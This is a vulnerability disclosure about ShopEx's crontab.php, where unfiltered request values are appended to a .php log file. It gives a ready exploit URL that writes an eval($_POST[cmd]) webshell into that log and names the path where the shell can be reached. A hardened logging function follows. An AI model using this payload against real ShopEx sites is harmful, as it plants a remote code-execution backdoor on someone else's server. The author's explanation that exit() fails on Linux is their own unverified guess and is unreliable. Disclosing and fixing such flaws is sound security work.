ShopEx is an online shop system and sales platform, and one of the earliest online shop software providers in China. It is currently the company in China that has developed online shop systems for the longest continuous period, the software provider with the highest share of the online shop software market in China, and the largest company in the online shop software industry.
Vulnerability description: The variables handled in crontab.php are not strictly filtered. In addition, PHP's exit() was found not to exit on Linux, so execution continues, which gives rise to the vulnerability.
Vulnerability code:
core/include_v5/crontab.php is Zend-encrypted; I am only releasing the decrypted code.
    public function run()
    {
        $this->logFile = HOME_DIR . "/logs/access.log.php";
        $this->now = time();
        $this->viewStat();
        $messenger = &$this->loadModel("system/messenger");
        $messenger->runQueue();
    }

    public function viewStat()
    {
        // Create the log as a .php file that starts with an exit() guard
        if (!file_exists($this->logFile))
        {
            file_put_contents($this->logFile, "#<?php exit()?>"); // What else! By: Xiao Xiang
        }
        if (isset($_GET['action']))
        {
            // Request values are appended to the .php log file as-is
            error_log($this->now . "" . $_GET['action'] . "" . $_GET['p'] . "", 3, $this->logFile); // No filtering
        }
    }
Vulnerability exploitation:
I do not know the underlying principle. I tested only a few sites and found that on Linux, PHP's exit() would not exit and execution continued, which gives rise to the vulnerability.
Directly submit: http://127.0.0.1/shopex/?cron=1&action=1&p=1<?php%20eval($_POST[cmd])?>
One-line webshell: http://127.0.0.1/shopex/home/logs/access.log.php
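A hardened counterpart of the viewStat() logging shown above, as an added example that is not ShopEx's own code: request values are percent-encoded before they are logged, and the log is a plain .log file rather than a .php file. The names log_field and view_stat_safe, the access.log file name and the temporary directory (standing in for a location outside the web root) are assumptions.

```php
<?php
// Added example (not ShopEx code). Names, file name and paths are assumptions.

// Make one request value inert for logging: reject non-strings, cap the
// length, then percent-encode every byte except A-Z a-z 0-9 - _ . ~
function log_field($value, int $max = 64): string
{
    if (!is_string($value)) {
        return '-';                      // e.g. a p[]=x parameter arrives as an array
    }
    return rawurlencode(substr($value, 0, $max));
}

// Hardened counterpart of viewStat(): takes the query array explicitly,
// writes to a .log file (never .php) and returns the line it appended.
function view_stat_safe(string $logDir, array $query, int $now): ?string
{
    if (!isset($query['action'])) {
        return null;
    }
    $line = $now . "\t" . log_field($query['action'])
          . "\t" . log_field($query['p'] ?? '') . "\n";
    $logFile = rtrim($logDir, '/') . '/access.log';
    if (file_put_contents($logFile, $line, FILE_APPEND | LOCK_EX) === false) {
        throw new RuntimeException("cannot write $logFile");
    }
    return $line;
}

// Constructed request using the parameter names from this page.
$query = ['cron' => '1', 'action' => '1', 'p' => '1<?php echo 1 ?>'];
$dir = sys_get_temp_dir() . '/shopex-log-demo';   // stand-in for a directory outside the web root
if (!is_dir($dir) && !mkdir($dir, 0700, true)) {
    throw new RuntimeException("cannot create $dir");
}
echo view_stat_safe($dir, $query, time());
$clean = strpos(file_get_contents($dir . '/access.log'), '<?') === false;
echo $clean ? "no PHP open tag in log\n" : "PHP open tag found in log\n";
```

Because the encoded line contains no `<` or `?` bytes, the stored entry cannot be parsed as PHP even if the file were later served by a PHP handler.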